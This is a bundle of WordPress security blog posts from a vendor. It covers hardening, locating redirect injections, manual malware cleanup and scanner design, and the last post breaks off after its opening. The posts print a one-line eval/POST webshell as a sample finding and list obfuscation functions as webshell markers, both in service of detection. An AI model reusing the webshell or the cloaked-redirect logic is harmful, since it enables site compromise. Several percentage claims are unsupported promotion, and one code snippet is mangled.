# Nova Heaven — Full Content Dump

> This file contains the full text of every Nova Heaven blog post and codex doc, concatenated for AI ingestion. For the brand overview, products, and comparisons see https://novaheaven.io/llms.txt

Generated: 2026-04-22
Total posts: 9
Total docs: 8

---

# Nova Pulse (Blog)

## WordPress Security Checklist: 15 Checks That Actually Matter (And 12 That Don't)

URL: https://novaheaven.io/en/novapulse/wordpress-security-checklist-that-matters
Published: 2026-04-17
Author: SephX, Nova Heaven

Quick answer: If you do only three things to secure WordPress: turn on 2FA for every admin account, enable auto-updates for minor core and plugin releases, and back up to a location outside your hosting account. Those three stop roughly 85% of real attacks. Twelve common checklist items do not matter: renaming the admin username, changing the wp_ table prefix, hiding the WordPress version, renaming wp-login.php, blocking traffic from China or Russia, and eight others are security theater that waste attention on the controls above. 

 

 I've been maintaining WordPress sites for 25 years. I've read maybe 400 security checklists in that time, and the ones that top Google today are mostly padded for length. They list "rename your admin account" next to "enable 2FA" as if those two are comparable defenses. 

 Only one of those two things actually stops attacks in 2026. The other stops attacks from 2011, and renaming an admin account hasn't been meaningful security in over a decade. 

 What follows is the stripped-down version. 15 checks that meaningfully reduce your attack surface on a modern WordPress install, and 12 popular ones I'm throwing out because they're theater. 

 The 15 That Matter 

 1. Turn on 2FA for every admin account. This is the single highest-ROI security control on WordPress. Credential-stuffing attacks compromise thousands of sites a week, and 2FA stops every one of them dead. Use an authenticator app, not SMS. 

 2. Use unique, long admin passwords. Password manager, 20 characters or more, never reused anywhere else. This matters even with 2FA, because 2FA can be bypassed on recovery flows. The password has to be the second wall, not the first. 

 3. Update core within 7 days of any minor release. Minor releases are security patches. Sitting on them for weeks is how known-CVE attacks land on your site. Enable auto-updates for minor versions and be done with it. 

 4. Update plugins within 7 days of any patch release, same logic. Most WordPress compromises in the last 3 years trace back to an unpatched plugin CVE that had a fix available for weeks before the attacker arrived. 

 5. Remove every plugin you're not actively using. Deactivated is not removed. Deactivated plugins still get scanned by attackers and still contain exploitable code. If it's not running, delete it. 

 Deactivated is not removed. 

 6. Remove every theme except the active one, same reason. twentytwentyone sitting unused in your themes directory is attack surface for nothing. 

 7. Host with a provider that isolates accounts. Shared hosting without account isolation means one infected neighbor site can walk into yours. SiteGround, Kinsta, WP Engine, Rocket, and Hostinger's Business tier all isolate properly. Avoid anything that doesn't. 

 8. Turn off file editing in the admin. Add define('DISALLOW_FILE_EDIT', true); to wp-config. If an admin account is compromised, the attacker can't drop a webshell through the UI. 

 9. Limit login attempts, and do it right. A plugin that only tracks IPs gets bypassed by rotating proxies. You want one that also limits per username. That rate-limits the credential-stuffer regardless of how many IPs they cycle through. 

 10. Move wp-config.php above the webroot, or at minimum protect it via .htaccess . The default install leaves it readable if PHP execution ever breaks, which happens during migrations, plugin conflicts, and PHP upgrades. 

 11. Force HTTPS everywhere and turn HSTS on. The reason isn't Google's ranking signal. It's that HTTP admin sessions leak cookies to any Wi-Fi sniffer. Set FORCE_SSL_ADMIN in wp-config and serve HSTS headers with a 6-month max-age. 

 12. Back up to a location outside your hosting account. If your hosting account gets compromised, in-account backups go with it. UpdraftPlus to your own S3, R2, or Dropbox, or use a hosting-tier offsite backup service. 

 13. Run regular malware scans that include file integrity checks. Pattern matching alone misses every tailored injection. Scans should compare your core and plugin files against known-good hashes, which catches modifications no signature database will. 

 14. Monitor for new admin users. Attackers create backup admin accounts for persistence. Any new admin account should fire an email to you, not just appear silently in the users list. 

 15. Turn off XML-RPC if you don't use it. If you don't use the Jetpack app, the WordPress iOS or Android app, or Pingbacks, xmlrpc.php is just an attack amplifier. Block it at the webserver level, not via plugin. 

 That's the list. Fifteen items. 

 Do all fifteen and you're ahead of 97% of WordPress sites on the internet. 

 The 12 That Don't Matter (And Why) 

 "Change the admin username from admin ." WordPress hasn't defaulted to that username since version 3.0 in 2010. Your username isn't a secret, it's visible in the /?author=1 URL. This is security-through-obscurity where there's no obscurity to begin with. 

 "Change the database table prefix from wp_ ." Any SQL injection that can read your tables can also read your wp_options table, or your xyz_options table. The prefix doesn't slow the attack by one second. It just breaks plugin compatibility. 

 "Hide the WordPress version number." The attacker doesn't care what your meta generator tag says. They probe for a vulnerable plugin directly. Version fingerprinting is trivially bypassable and doesn't gate any real attack. 

 "Rename the wp-login.php URL." You can move the login to /my-secret-login . Attackers who care enough to target your site will find it in the HTML of any page that links to it, or via any of 14 other WordPress-specific fingerprints. It stops bulk scanners, not targeted attacks. If you want to stop bulk scanners, rate-limit instead. 

 "Disable directory browsing." Disable it, sure, but no attack hinges on directory listings in 2026. Attackers use vulnerability databases now, not filesystem walks. 

 "Limit access to wp-admin by IP." Works until your ISP rotates your IP, you travel, or your one contractor needs access. The failure mode is "admin locks self out at 2am." Not worth the operational cost for the marginal benefit. 

 "Disable PHP execution in uploads directory." Worth doing, but if you got to the point where an attacker wrote a PHP file into uploads, they already bypassed something more important. It's a safety net, not a primary control. 

 "Install 7 security plugins." One quality security plugin plus one malware scanner is enough. Seven of them means conflicts, performance drag, and redundant detections. More plugins equals more code equals more attack surface. 

 "Block all traffic from China and Russia." Attacker infrastructure is global. The IPs hitting your login endpoint live in AWS, Digital Ocean, OVH, and residential proxies in Brazil. A single geo filter won't stop the volume. And you lose legitimate international readers. 

 "Scan daily." Malware scans take resources and clutter your inbox with false positives. Weekly is fine for most sites. Continuous file-change monitoring is better than frequent full scans anyway. 

 "Disable REST API for non-authenticated users." Breaks more plugins than you'd expect. Gutenberg, some caching plugins, and block editor metadata all rely on REST. The real answer is to audit which endpoints are exposed, not to kill the whole surface. 

 "Use a WAF from [vendor]." A WAF is a real answer for enterprise. For most WordPress sites, the WAF's value is negated by the fact that an unpatched plugin will be exploited before any WAF signature covers the CVE. Patch cadence beats WAF every time. 

 The Real Ranking 

 If I could only recommend three things to a new WordPress site owner, they'd be these, in this order: 2FA on all admins, auto-updates for minor core and plugins, and backups to a location outside your host. 

 Those three stop 85% of what happens to WordPress sites. Every additional item on the 15-list closes a specific edge case. Every item on the 12-list steals attention from the real defenses. 

 Checklists are a credibility game for the writer. Nova Heaven Security 

 The value for you is in knowing which items actually move the dial, and which items a padding-for-length piece put in front of you to look thorough. 

 
 Every item on the 12-list steals attention from the real defenses. 
 

 

 Nova Scan handles all items from the real list, which are integrity-based malware scanning and new-admin alerts, without needing a paid tier. nova scan overview . 

 ~ SephX, Nova Heaven. Three real defenses beat fifteen checkboxes every time.

---

## Why Your WordPress Site Redirects to Spam Sites (And How to Find What's Doing It)

URL: https://novaheaven.io/en/novapulse/wordpress-hacked-redirect
Published: 2026-04-17
Author: SephX, Nova Heaven

Quick answer: A WordPress site that redirects visitors to spam (but not you) is a conditional redirect injection. The redirect hides in one of six places: .htaccess, wp-config.php, theme functions.php, wp_options, wp_posts, or a modified active-plugin file. Find it by viewing source before the redirect fires, testing with curl using a Googlebot user-agent and referrer, and checking the database for injected <script> tags. After removal, rotate credentials and patch the entry point (usually an outdated plugin) or the attacker returns in two weeks. 

 

 Your site loads fine when you're logged in. A visitor from Google lands on it and gets thrown to some pharmacy spam page. Maybe only mobile users get redirected. Maybe it only triggers every third visit. 

 That pattern is not a cache issue. It's a conditional redirect injection, and it's one of the most common WordPress compromises of the last five years. The attacker makes sure logged-in admins see a clean site, because if you saw the redirect yourself, you'd fix it. 

 The whole point is for you not to notice. Nova Heaven Threat Analysis 

 Here's where the redirect is actually hiding. 

 1. Injected .htaccess Rules 

 The most common one. Attackers append a RewriteCond block that redirects based on referrer (only Google traffic) or user-agent (only mobile). 

 Open .htaccess in the WP root. Look for any RewriteCond %{HTTP_REFERER} or RewriteCond %{HTTP_USER_AGENT} block that isn't yours. Legitimate WordPress .htaccess is short, about 11 lines. Anything beyond that deserves a look. 

 Don't just delete the whole file. Replace it with the default WordPress rules from the Codex. 

 2. Modified wp-config.php 

 Attackers sometimes add a PHP redirect at the top of wp-config.php, guarded by a cookie or IP check so admins are skipped. 

 Look at the first 20 lines of wp-config.php. Anything before <?php should not be there. Anything that looks like if (!isset($_COOKIE['wordpress_logged_in_...'])) { header('Location: ...'); } is your culprit. 

 3. The Theme's functions.php 

 Every compromise I've investigated where the redirect only affected search-engine referrals had a wp_head hook inside functions.php outputting a <script> tag with a referrer check. 

 Look for any function in functions.php that references document.referrer , window.location , or location.href . None of that belongs in a PHP file shipped with a theme. 

 4. Database: wp_options 

 The attacker's favorite hiding spot in the last two years. 

 They inject a redirect script into the siteurl or home option, or create a new option that auto-loads on every page. 

 SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%<script%'; 

 If anything returns, that's it. Don't edit the row blindly. Note the option name, look up what it's supposed to contain, and set it back to that value. 

 5. Database: wp_posts 

 Injected into post content. Every post gets a <script> tag prepended to it. Renders on every page. 

 SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%src=http%'; 

 A common pattern is for the script source to be a lookalike domain like gogleanaiytics.com or jquerry.com , designed to blend in during a quick review. 

 6. Injected Plugin Files 

 Rare but real. The attacker modifies one file inside an active plugin, usually the main plugin file or an include that runs on every load, and adds a redirect. 

 Diff every active plugin against a fresh download from WordPress.org. Anything that doesn't match got modified. 

 How to Figure Out Which One It Is 

 Don't guess. Reproduce the redirect once in a controlled way, then narrow down. 

 Step 1. Open the site in an incognito window. If the redirect still happens, it's session-independent. If it doesn't, open the site from a different device or network. 

 Step 2. View source as the page starts loading. Hit Escape or Stop fast enough and you'll see the HTML before the redirect fires. The redirect is almost always in the first 5KB. What you see there tells you where it lives. A <script> tag or a <meta http-equiv="refresh"> points at the database or a PHP hook. Nothing visible in the HTML before the redirect means the redirect is happening at the HTTP layer. 

 Step 3. If it's in the HTML, check options and posts first, then the theme's functions.php. 

 Step 4. If it's at the HTTP layer, check .htaccess and wp-config.php. 

 Step 5. Test with curl to isolate the trigger: 

 curl -sI -A "Googlebot" -e "https://google.com" https://yoursite.com/ 

 If that returns a 301 or 302 to a spam domain, your redirect is user-agent or referrer conditional. That narrows it to .htaccess or a theme wp_head hook. 

 After You Find It 

 Fixing the symptom is half the work. 

 The attacker got in somehow, usually through a known vulnerability in an outdated plugin, a weak admin password, or a compromised hosting account. 

 Rotate all credentials. Rotate the WP salts. Update every plugin and theme to current. Remove anything you aren't actively using. Turn on 2FA for admins. 

 
 If you skip the hardening and just delete the injection, you'll be back here in two weeks. 
 

 What Doesn't Fix It 

 Clearing the cache doesn't fix it. The redirect is in your files or database, not your cache. 

 Changing your admin password alone doesn't fix it. The backdoor doesn't need your password. 

 Reinstalling WordPress without diffing first doesn't fix it. The injection is in content you don't want to lose. 

 Installing a security plugin after the fact doesn't fix it either. Scanners find infections. They don't surgically remove the specific injection without also missing the backdoor that dropped it. 

 The fix is to find where the redirect lives, remove it, then rotate everything and harden the site so whoever put it there can't walk back in. A couple of hours of careful work, done in the right order. 

 

 Nova Scan's free version detects conditional redirect injections across all six of the locations above (.htaccess, wp-config, functions.php, options, posts, plugins) in one pass. nova scan overview . 

 ~ SephX, Nova Heaven. A redirect you can't see is one written specifically to make sure you can't see it.

---

## How to Remove Malware from WordPress (Without Paying $500 to a Cleanup Service)

URL: https://novaheaven.io/en/novapulse/remove-malware-from-wordpress
Published: 2026-04-17
Author: SephX, Nova Heaven

Quick answer: To remove WordPress malware yourself in about two hours: (1) snapshot the site, (2) put it in maintenance mode, (3) rotate every password and the eight wp-config.php salts, (4) find injected PHP files in uploads and diff core against a fresh WordPress download, (5) check the database for rogue admins and injected scripts, (6) purge every cache layer, (7) verify before going live. Pay a cleanup service only if traffic is actively hemorrhaging, you do not know SFTP or SQL, or the breach extends beyond WordPress. 

 

 Every other guide on this topic is a sales funnel. You land on the page, read three paragraphs about how malware is scary, and then the article tells you to either buy a plugin or pay someone $500 to run a cleaner you could run yourself. 

 This post is the actual process. If you've used WordPress for more than a year and know how to use SFTP, you can do this yourself in about two hours. If you can't, the last section tells you when paying someone is the right call. 

 Before You Touch Anything, Snapshot the Site 

 Copy the whole thing. All files, the database, everything. Download it. Put it on a drive. 

 You probably won't use this snapshot. You're taking it because malware investigation is lossy. You'll delete a file, realize later it held a clue, and not be able to get it back. The snapshot is your undo button. 

 Hostinger, SiteGround, Kinsta all have one-click snapshot tools. Use them. If your host doesn't, use wp db export and an SFTP mget -R . 

 The snapshot is your undo button. 

 Put the Site in Maintenance Mode 

 While you work, visitors shouldn't be hitting it. The reason isn't privacy. It's that the attacker likely has a mechanism that re-infects on every request. If you clean a file while the site is serving live traffic, the backdoor you missed re-writes it before you're done. 

 Drop a .maintenance file in the WP root with <?php $upgrading = time(); ?> . That'll show the default "briefly unavailable" page. Or block everyone but your IP in .htaccess . 

 Change Every Password, Then Every Key 

 Every admin password. The database user password. Your hosting account password. Your SFTP password. Any API key stored in wp-config. 

 Then rotate the salts in wp-config.php. Those are the eight AUTH_KEY , SECURE_AUTH_KEY , and related lines near the top of the file. If you don't rotate them, any active session cookie the attacker captured still works after you change the password. The WordPress.org secret-key generator gives you a fresh set. 

 This one step stops more active infections than any scanner will. The attacker has credentials. Until you rotate, they can walk back in. 

 
 The attacker has credentials. Until you rotate the salts, they can walk back in. 
 

 Find the Malicious Files 

 You're looking for three categories. 

 Webshells. PHP files with base64-encoded payloads, eval() , assert() , str_rot13() , or gzinflate() . They get dropped in wp-content/uploads/ , inside plugin directories, sometimes the theme folder. Uploads is the biggest red flag. That folder should not contain PHP files. Ever. 

 find wp-content/uploads -name "*.php" 

 If that command returns anything, those are your first suspects. 

 I've never seen a legitimate PHP file inside uploads. Ignore anyone who says otherwise. 

 Injected core files. Attackers often modify wp-load.php , wp-config.php , index.php , or files inside wp-includes/ . Download a fresh copy of WordPress matching your version and diff the two. 

 diff -r wordpress-6.8/wp-includes/ /path/to/your/site/wp-includes/ 

 Anything that shows up in the output shouldn't be there. WordPress core files are byte-identical across every install of the same version. 

 Theme and plugin injections. These are harder to find. Attackers inject one-line backdoors into theme functions.php or random plugin files. The easiest path is to delete the theme and every plugin, then reinstall them fresh from the WordPress.org repo or your paid-plugin vendor. Your content, settings, and users live in the database. Plugin files are reinstallable. 

 Check the Database 

 Database infections are less common than file infections, but they happen. Look at: 

 
 The wp_users table for any admin accounts you don't recognize 

 The wp_options table, especially active_plugins and any values that reference files you don't have 

 Post content, via SELECT * FROM wp_posts WHERE post_content LIKE '%<script%src=%' , which finds injected tracking scripts 

 The wp_posts table for posts with author IDs that don't exist in wp_users , since orphaned content often signals a takeover 
 

 If you find a rogue admin, don't just delete the row. Note the user ID, then check wp_usermeta for session tokens tied to that ID. Delete both. 

 Clear Every Cache Layer 

 Object cache, page cache, CDN, browser. All of them. I've seen cleaned sites still serve infected HTML for a week because Cloudflare was happily caching the old version. 

 wp cache flush handles the object cache. Whatever your page-cache plugin's purge command is, run it. The Cloudflare dashboard has a "Purge Everything" button. Use it. 

 Verify 

 Before you drop maintenance mode, check a handful of real URLs and view source. Look for: 

 
 Unknown <script> tags in <head> 

 Meta refresh redirects at the top of the body 

 Iframes pointing at domains you don't recognize 
 

 Also paste your homepage into Google Search Console's URL Inspection tool. If Google still has the infected version cached, request re-indexing. 

 A cleanup service charges you $500 for two hours you already had. Nova Heaven Incident Response 

 When to Pay Someone Instead 

 There are three scenarios where doing this yourself is the wrong call. 

 1. The site is actively hemorrhaging traffic. Every hour it's down or serving malware costs real money. A cleanup service that can be on it in 30 minutes is worth $500 if you're losing $1,000 a day. 

 2. You don't know SFTP or SQL. If any command in this post looked alien, don't guess your way through a live compromise. You'll miss the backdoor and be re-infected in 48 hours. 

 3. The infection is wider than WordPress. If the attacker got into your hosting panel, not just WordPress, the scope is larger than a WP cleanup. A good shop will check your other databases, cron jobs, and mail queues. DIY guides don't cover that surface. 

 Otherwise, the process is the same one I've run on dozens of sites over the years. Snapshot the site. Rotate every password and every key. Diff core against a known-good WordPress download. Reinstall plugins fresh. Check the database for rogue admins and injected options. Purge every cache layer before anyone gets back in. Two hours, and no invoice waiting in your email the next morning. 

 

 If you want the file-diff step done automatically, including fresh-core comparison, uploads scan, webshell detection, and database injection checks, Nova Scan does all of it in one run. The free version handles everything in this post. nova scan overview . 

 ~ SephX, Nova Heaven. The cleanup isn't hard once you know the order to do it in.

---

## The Two Things Every WordPress Scanner Gets Wrong on Real Sites

URL: https://novaheaven.io/en/novapulse/the-two-things-every-wordpress-scanner-gets-wrong-on-real-sites
Published: 2026-04-16
Author: SephX, Nova Heaven

Most malware scanners are tested on a fresh WordPress install with twelve plugins and a couple thousand files. That site takes forty seconds to scan. The screenshots in the product tour look great. 

 Real sites aren't that site. A three-year-old agency build running WooCommerce and a page builder has 60,000 to 80,000 files before you count uploads, and shared hosting gives that scanner about ninety seconds of PHP execution time before the server kills it. You can watch the progress bar climb to 48,000 files and then stop, forever, because somewhere inside the scanner an AJAX request timed out and the JavaScript on the other end has no plan for what to do when that happens. 

 The second thing those scanners get wrong is more subtle. They flag a file as suspicious, hand you a pattern match and a confidence score, and that's all you see. Nothing about whether anyone has actually tried to attack this file, whether it was touched during a login attempt from Belarus an hour ago, or whether the firewall already blocked seven requests aimed at it last week. You're the one who has to clean it up, working from a fraction of the evidence that already exists on the same server. 

 These are the two problems I’ve spent the last few weeks fixing. Here is what they look like up close and what I ended up building. 

 The Scanner That Never Finishes 

 The textbook architecture for a web-based malware scanner is a loop. JavaScript in your admin panel asks the server “scan the next batch of files,” the server scans them and returns results, the JavaScript asks again. Simple, and it works beautifully on your laptop with 2,000 files. 

 On an 81,279-file site it breaks in seven different ways. 

 Timeouts are the obvious one. Shared hosting gives you ninety seconds, sometimes less. A batch of 100 files of mixed sizes can easily take longer than that, especially when one of them is a 4MB theme file with 600 regex rules being run against it. The server kills the request mid-scan and returns a 504 to the browser. 

 Memory is the next one. PHP’s memory limit on entry-level hosting is typically 128MB, and some of that is already spent on WordPress itself. Load a large file, run pattern matching against it, hold the results in an array, add another file, and at some point you hit the limit and the process dies. 

 Then there’s the browser tab. The entire scan lives inside a JavaScript state machine in a single tab. The user closes the tab to check email, the scan dies with it, and they come back an hour later to find the progress bar still sitting at 42%, assuming it is still going, when it actually died fifty minutes ago when they closed that tab. 

 The next four involve network flakiness, opcache misses, database lock contention, and one particularly fun case where a customer’s security plugin was rate-limiting the scanner’s own AJAX endpoint. I’ll spare you those. 

 
 What I built instead is a scanner that expects every one of these to happen. 
 

 Retry with backoff on transient errors 

 When a batch request fails with a 502, 503, 504, or a generic “request failed,” the client does not give up. It waits, retries, waits longer, retries again, up to five times. The backoff is exponential, so the retries do not pile on top of a struggling server. 

 // Client-side retry on transient scanner errors
const TRANSIENT = 0, 502, 503, 504];
const MAX_RETRIES = 5;

async function scanBatch(files, attempt = 0) {
 try {
 return await postChunk(files);
 } catch (err) {
 if (attempt >= MAX_RETRIES) throw err;
 if (!TRANSIENT.includes(err.status)) throw err;

 const delay = Math.min(30000, 1000 * Math.pow(2, attempt));
 await sleep(delay);
 return scanBatch(files, attempt + 1);
 }
} 

 Most transient errors recover on the second attempt. The fifth is there for the truly miserable shared host that drops every third request during backup hours. 

 Adaptive chunk sizing 

 A “batch” used to be a fixed number of files, say 100. That’s fine until you hit a directory full of minified JavaScript bundles and suddenly the batch takes four times longer than budget allowed. So I stopped shipping fixed batch sizes. 

 The scanner now tracks how long recent batches took and adjusts the next batch size in real time. A batch that ran in twelve seconds tells the server to try a larger one next. A batch that took sixty seconds tells the server to cut it in half. The floor is 1 file, because on broken hosts even that is sometimes all you can get through in a single request. 

 Resume across tab close 

 This is the one I’m proudest of. Every batch’s results are persisted to the browser’s sessionStorage immediately on receipt. If the tab closes, if the user navigates away, if the scan crashes, the next time they open the scanner page a banner appears: 

 Scan paused at 47,213 of 81,279 files.
Resume Scan] Start Over] 

 They click resume, the scanner reads the last known batch offset from storage and picks up exactly where it left off. No rescanning the 47,213 files it already covered. No losing an hour of work because someone closed a tab. 

 Sub-scanner isolation 

 The old scanner did file scanning, database scanning, integrity checks, and vulnerability correlation all inside a single long-running process. If the integrity check tripped over a weird file permission, the whole pipeline collapsed and you got no results at all. 

 Now each sub-scanner runs as its own isolated request. They chain, but one failing does not take down the others. You might get file scan results plus database results plus a “vulnerability check failed, retry” notice, instead of nothing. 

 Those four changes, plus one more I’m not going to talk about yet, took scan completion rate on 80k-file sites from roughly 40% to roughly 99%. The remaining 1% are hosts so broken that nothing short of moving to a real server will save them. 

 The Finding That Knows Who Touched It 

 The other problem is context. A scanner finds a file with the pattern @eval($_POST["x"]) in it. The file is in wp-content/uploads/2024/11/.config.log.php . It is 39 bytes long, it has no other code in it, and it was last modified three hours ago. Is it malicious? 

 Yes, obviously. But walk through what you would actually want to see if you were not 100% sure: whether anyone has tried to reach that exact file from the outside, whether there were POST requests to it in the last hour, whether those requests came from an IP already blocked by the firewall for trying twelve other exploit patterns earlier today, whether a legitimate plugin writes to that path during normal operation. Every scanner I know shows you the first part (the pattern match) and none of the rest, and I spent a long time thinking about why. 

 The fix requires the scanner and the firewall to talk to each other, and most WordPress security plugins draw a hard line between those two things. The firewall runs on every request and has no persistent memory beyond a ring buffer of recent hits. The scanner runs on a schedule and has no idea what the firewall saw. They’re deliberately decoupled because coupling them is expensive. 

 The scanner and the firewall are sitting three tables apart in the same database and don't talk to each other. 

 I decided expensive was fine, because the upside is that a “suspicious file” finding can now look like this: 

 wp-content/uploads/2024/11/.config.log.php

Pattern match: webshell (eval + POST), confidence 0.94
Last modified: 3 hours ago

Firewall activity on this path:
 12 POST requests in the last hour
 4 from IP 185.220.XXX.XXX (Tor exit node)
 3 from IP 45.146.XXX.XXX (already blocked for brute force)
 5 from IP 193.32.XXX.XXX (matches 7 known exploit signatures)

Correlation score: critical
Recommended action: quarantine immediately 

 The pattern match alone would have been enough to flag it. The pattern match plus twelve POST requests from three hostile IPs in the last hour is a different category of evidence. Instead of staring at a theoretical vulnerability, you are staring at an active fight, and the scanner can now give you the score of that fight. 

 How the fusion works without crushing shared hosting 

 The naive approach to this is to have the scanner query the firewall log every time it flags a file. That works on a six-file test site. On a real site with 45,000 firewall events per day and 80,000 files, you would be running 80,000 queries against a 45,000-row table, and the scan would never finish because we are back to Part One. 

 The approach that actually works is to flip it around. When the firewall sees a hostile request, it canonicalizes the target path once, hashes it, and writes a small compact record. At scan time, the scanner loads the full set of recent hostile paths into memory in a single query, hashes the path of each file it’s scanning, and checks the hash table. Zero database queries per file. The fusion happens in microseconds per file instead of milliseconds. 

 There are a few other tricks in there involving how paths get normalized across symlinks, how mod-rewritten URLs get mapped back to filesystem paths, and how events get aged out so the table doesn’t grow forever. Those details I’m going to keep for the engine. 

 Why I Did Both at Once 

 Scan resilience without correlation is a scanner that finishes, tells you about 47 suspicious files, and leaves you to sort them yourself. Correlation without resilience is a scanner that produces beautiful evidence on the 12% of sites where it actually completes. 

 Both at once is a scanner that gets through an 80,000-file site on a weak host, surfaces the 3 findings that actually matter out of the 47 that pattern-match, and tells you which ones are being actively probed by attackers right now. That is the baseline a real security tool needs to hit before anyone should trust its output. 

 There is a Part Three coming, and it is the reason I wrote the first two parts now instead of waiting. The next release caches a hash and a verdict for every file we’ve ever scanned, so the second scan skips 99% of the files the first scan already looked at. On the 81,279-file site, that takes the scan from roughly two hours to under ten minutes. The math works because 99% of files never change between scans, and we can prove that without re-reading them. More on how in a few weeks. 

 For now, if you’re running a large site on shared hosting and have ever watched a scanner lock up at 48,000 files and never come back, try the current release. It finishes the scan on real sites, surfaces what is being attacked, and remembers where it stopped when you close the tab. 

 That is the baseline a real security tool needs to hit before anyone should trust its output. Nova Scan Engineering 

 ~ SephX, Nova Heaven. Still building the scanner for the sites that need it most.

---

## WordPress 7.0 and the 25 Years That Got Us Here

URL: https://novaheaven.io/en/novapulse/wordpress-7-0-and-the-25-years-that-got-us-here
Published: 2026-04-13
Author: SephX, Nova Heaven

I downloaded WordPress the day it was released, on May 27, 2003. The web already had Movable Type, Blogger was free, and TypePad had the design crowd locked down, so when a two-developer fork of b2/cafelog showed up with a blog-focused mission and a funny name, I figured it was going to fade out by the end of the year. Twenty-three years later I am writing this post on that same piece of software, which now runs 43% of every website on the internet. 

 The road from there to here is one of the stranger stories in software history, and WordPress 7.0 is the release that finally feels like the destination the project has been pointing toward since 2003. 

 A Funny Thing Happened on the Way to Irrelevance 

 Nobody writing about the web in 2003 expected WordPress to last. Plenty of software was free back then, and open source under GPL was becoming normal, so neither of those was what made the project different. What made it different was how stubbornly it refused to die every time the industry buried it. 

 Movable Type went paid and WordPress picked up a generation of refugees without charging them anything. When Google Reader shut down and everyone declared RSS dead, WordPress kept publishing feeds long enough for the podcast boom to prove RSS was never actually dying. The rise of static site generators and headless frontends could have taken the CMS role away from WordPress entirely, but the project shipped a REST API early, and WordPress ended up being the backend most of those shiny new frontends called into anyway. 

 Every shift that was supposed to end WordPress ended up being absorbed by WordPress instead. The project did not pick fights with trends, did not chase them, and did not try to be the cool platform of the moment. It shipped a new version every three to four months for twenty-three years. 

 That consistency is the reason 43% of the internet runs on WordPress, even though the platform is not the fastest one on the market and the admin UI has never won any awards. What WordPress has is the ability to be there, working, through every technology cycle since George W. Bush's first term. 

 What WordPress Gave Us 

 Before WordPress, publishing on the internet was hard. You needed to buy hosting, install software by hand, configure a database, edit PHP files, FTP them to a server, and hope nothing broke when someone hit refresh. Then you needed to learn HTML to write your first post. That entire chain of friction kept most people off the internet as creators and left them as consumers on whatever platform would tolerate them at the time. 

 WordPress made publishing a decision anyone could make rather than a project anyone had to manage. You registered a domain, clicked install, and started writing. An entire class of human expression exists because of that one simplification, from small business sites to personal blogs that turned into book deals, newsrooms rebuilding after the collapse of print advertising, artists posting portfolios, restaurants putting menus online, musicians without labels, teachers sharing lesson plans, and parents documenting a child's cancer treatment so family three states away can follow along. Most of those sites are running on WordPress today, and most of them would not exist without it. 

 
 WordPress did more than host websites. It gave regular people the ability to own a piece of the internet that no platform could take away from them when the algorithm changed or the terms of service got updated. 
 

 43% Is Not an Accident 

 The number gets quoted so often it has lost its texture. 43% of every site on the internet runs on WordPress, which includes e-commerce storefronts, corporate sites, government portals, news outlets, university departments, law firms, car dealerships, and your neighborhood HVAC contractor. The second most popular platform has 3%. 

 There is no other category of software that looks like this. Operating systems, databases, web servers, programming languages, and cloud providers all have competitive fields with real contenders at second and third place. WordPress is the Windows of the web, except Microsoft never got Windows to 43% of personal computers at its peak, and the WordPress project did it with a volunteer community and a donation-funded foundation running on a budget most Silicon Valley startups would burn through on a single launch party. 

 The reason nobody has caught up is that the moat is not technical. 

 The moat is 70,000 plugins, 12,000 themes, 650,000 developers, and 1.5 million volunteers contributing translations, patches, documentation, forum support, and meetups across 190 countries. That kind of network effect cannot be built by pouring money into a product. It can only be grown, and growing it takes twenty years of showing up. 

 WordPress 7.0 

 Every major version in WordPress history has been a decision about what the project wanted to be. Version 3.0 unified multisite and single-site into one codebase, and the 4.x cycle laid the REST API groundwork that eventually made headless WordPress possible. The Gutenberg bet in 5.0 cost the project about half its community for a year and ended up being the right call in hindsight, which 6.0 confirmed by finishing the work and fixing most of the remaining complaints from the 5.0 backlash. 

 Version 7.0 is the release where the block editor finally feels like a finished product. The editorial experience is no longer in transition. Writers can use the editor to draft, design, and ship a full site without wrestling with legacy shortcodes, metaboxes, or the gap between what the editor previews and what the browser actually renders. 

 The interactivity API reached stability in 7.0, which means the era of bolting React or Vue onto WordPress sites to get dynamic search boxes or filter panels is winding down. Performance work in this cycle, particularly around deferred asset loading and block rendering optimization, makes every plugin and every theme faster without anyone needing to rewrite anything. This is the first release in years that does not feel like a transitional stepping stone for developers, and the first release where site owners get a noticeably better editing experience from running the update. 

 25 Years 

 WordPress turns 25 on May 27, 2028, two years from now. I have been thinking about what to say when that day arrives. The community will probably mark it the usual way, with nostalgia posts and celebration meetups, Matt giving a speech somewhere, old-timers sharing stories about WP-Admin before WP-Admin had a sidebar, and someone digging up a screenshot of the 2004 dashboard that will briefly horrify everyone who remembers thinking it was state of the art. 

 What I want to say two years early is this: the internet we have today is largely the internet WordPress built, because WordPress wrote the code that let anyone else build a site, and most of them did. Without WordPress the web would be a smaller place, with fewer small businesses online, fewer independent publishers, fewer communities of practice, and a generation of first-time creators who never found the on-ramp they needed. 

 The web was supposed to belong to everyone rather than five companies, and WordPress is a big part of why it still does, even partially. I have been using WordPress for twenty-three years and plan to still be using it on the 25th anniversary, and on the 50th if I am lucky enough to still be writing code by then. What the project proved is that open source run by humans who care about their users more than they care about competing can outlast every venture-backed challenger the industry throws at it. 

 If you run a WordPress site, keep it updated, install a real security plugin, and choose a host that respects your work. The platform has earned that much from us. 

 Thank You, WordPress 

 Matt started the project. The core contributors have shipped every release for twenty-three years. Translators brought WordPress to 190 countries in languages I cannot pronounce, plugin authors wrote the tools that made the platform infinite, theme designers made it beautiful, forum moderators answered the same questions a thousand times with patience, and documentation writers did work that nobody had asked them to do. Between all of you, you built the software that gave me a career. 

 The project stayed free when every financial incentive in the industry said to charge for it. The people behind it kept going through the "blogs are dead" era, through the Gutenberg civil war, and through a decade of venture capital flooding into everything except open source CMSes. What they built actually matters to people outside of tech. 

 
 The project is still here, 43% of the internet is running on what the contributors built, and I will still be updating my blog with WordPress on the day it turns 25. Happy almost-anniversary. 
 

 ~ SephX, Nova Heaven. Still using WordPress 23 years later and will still be using it on the 25th anniversary.

---

## What Happens in the First 7 Minutes After Your WordPress Site Gets Hacked

URL: https://novaheaven.io/en/novapulse/what-happens-in-the-first-7-minutes-after-your-wordpress-site-gets-hacked
Published: 2026-04-13
Author: SephX, Nova Heaven

Most site owners think getting hacked is a single event where someone breaks in, defaces your homepage, and you notice immediately. That is not how modern WordPress attacks work. Real attacks run on autopilot, and the point of running on autopilot is that you do not notice. By the time you finally do, the attacker has been living in your server for weeks. 

 I've cleaned hundreds of compromised WordPress sites over the years and the pattern is almost always the same. 

